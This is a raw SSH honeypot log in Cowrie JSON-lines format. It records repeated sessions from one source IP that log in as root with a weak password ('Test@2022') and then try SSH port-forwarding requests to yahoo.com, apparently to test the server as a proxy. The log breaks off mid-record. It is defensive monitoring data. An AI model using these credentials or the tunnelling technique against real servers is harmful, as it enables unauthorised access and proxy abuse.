{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:04.037668Z","src_ip":"213.209.150.239","session":"6c6703cbfed3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":54533,"dst_ip":"1.2.3.4","dst_port":22,"session":"b65801368a0e","protocol":"ssh","message":"New connection: 213.209.150.239:54533 (1.2.3.4:22) [session: b65801368a0e]","sensor":"my-vps","timestamp":"2025-08-26T00:56:04.083754Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:04.084644Z","src_ip":"213.209.150.239","session":"b65801368a0e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:04.132474Z","src_ip":"213.209.150.239","session":"b65801368a0e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:04.369117Z","src_ip":"213.209.150.239","session":"b65801368a0e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":32750,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:32750","sensor":"my-vps","timestamp":"2025-08-26T00:56:04.417709Z","session":"b65801368a0e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:04.465162Z","src_ip":"213.209.150.239","session":"b65801368a0e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":23522,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:23522","sensor":"my-vps","timestamp":"2025-08-26T00:56:04.601599Z","session":"b65801368a0e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:04.649073Z","src_ip":"213.209.150.239","session":"b65801368a0e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:04.697635Z","src_ip":"213.209.150.239","session":"b65801368a0e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":54588,"dst_ip":"1.2.3.4","dst_port":22,"session":"cba96fe0c459","protocol":"ssh","message":"New connection: 213.209.150.239:54588 (1.2.3.4:22) [session: cba96fe0c459]","sensor":"my-vps","timestamp":"2025-08-26T00:56:04.753276Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:04.762163Z","src_ip":"213.209.150.239","session":"cba96fe0c459"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:04.810509Z","src_ip":"213.209.150.239","session":"cba96fe0c459"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:05.093517Z","src_ip":"213.209.150.239","session":"cba96fe0c459"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":15735,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:15735","sensor":"my-vps","timestamp":"2025-08-26T00:56:05.151561Z","session":"cba96fe0c459"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:05.208335Z","src_ip":"213.209.150.239","session":"cba96fe0c459"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":24091,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:24091","sensor":"my-vps","timestamp":"2025-08-26T00:56:05.363218Z","session":"cba96fe0c459"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:05.420174Z","src_ip":"213.209.150.239","session":"cba96fe0c459"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:05.478146Z","src_ip":"213.209.150.239","session":"cba96fe0c459"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":54630,"dst_ip":"1.2.3.4","dst_port":22,"session":"553d23b59c68","protocol":"ssh","message":"New connection: 213.209.150.239:54630 (1.2.3.4:22) [session: 553d23b59c68]","sensor":"my-vps","timestamp":"2025-08-26T00:56:05.533866Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:05.535027Z","src_ip":"213.209.150.239","session":"553d23b59c68"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:05.592041Z","src_ip":"213.209.150.239","session":"553d23b59c68"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:05.874901Z","src_ip":"213.209.150.239","session":"553d23b59c68"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":2610,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:2610","sensor":"my-vps","timestamp":"2025-08-26T00:56:05.932506Z","session":"553d23b59c68"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:05.989447Z","src_ip":"213.209.150.239","session":"553d23b59c68"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":5184,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:5184","sensor":"my-vps","timestamp":"2025-08-26T00:56:06.143153Z","session":"553d23b59c68"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:06.200181Z","src_ip":"213.209.150.239","session":"553d23b59c68"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:06.257454Z","src_ip":"213.209.150.239","session":"553d23b59c68"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":54681,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b0260dd2185","protocol":"ssh","message":"New connection: 213.209.150.239:54681 (1.2.3.4:22) [session: 4b0260dd2185]","sensor":"my-vps","timestamp":"2025-08-26T00:56:06.313293Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:06.314175Z","src_ip":"213.209.150.239","session":"4b0260dd2185"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:06.370732Z","src_ip":"213.209.150.239","session":"4b0260dd2185"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:06.653106Z","src_ip":"213.209.150.239","session":"4b0260dd2185"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":16054,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:16054","sensor":"my-vps","timestamp":"2025-08-26T00:56:06.711290Z","session":"4b0260dd2185"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:06.768193Z","src_ip":"213.209.150.239","session":"4b0260dd2185"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":14531,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:14531","sensor":"my-vps","timestamp":"2025-08-26T00:56:06.923065Z","session":"4b0260dd2185"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:06.979857Z","src_ip":"213.209.150.239","session":"4b0260dd2185"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:07.037567Z","src_ip":"213.209.150.239","session":"4b0260dd2185"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":54734,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0057410f98c","protocol":"ssh","message":"New connection: 213.209.150.239:54734 (1.2.3.4:22) [session: e0057410f98c]","sensor":"my-vps","timestamp":"2025-08-26T00:56:07.083696Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:07.084406Z","src_ip":"213.209.150.239","session":"e0057410f98c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:07.131801Z","src_ip":"213.209.150.239","session":"e0057410f98c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:07.367274Z","src_ip":"213.209.150.239","session":"e0057410f98c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":28442,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:28442","sensor":"my-vps","timestamp":"2025-08-26T00:56:07.415371Z","session":"e0057410f98c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:07.462851Z","src_ip":"213.209.150.239","session":"e0057410f98c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":14229,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:14229","sensor":"my-vps","timestamp":"2025-08-26T00:56:07.597636Z","session":"e0057410f98c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:07.644951Z","src_ip":"213.209.150.239","session":"e0057410f98c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:07.692936Z","src_ip":"213.209.150.239","session":"e0057410f98c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":54788,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcd708db03af","protocol":"ssh","message":"New connection: 213.209.150.239:54788 (1.2.3.4:22) [session: fcd708db03af]","sensor":"my-vps","timestamp":"2025-08-26T00:56:07.739187Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:07.740417Z","src_ip":"213.209.150.239","session":"fcd708db03af"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["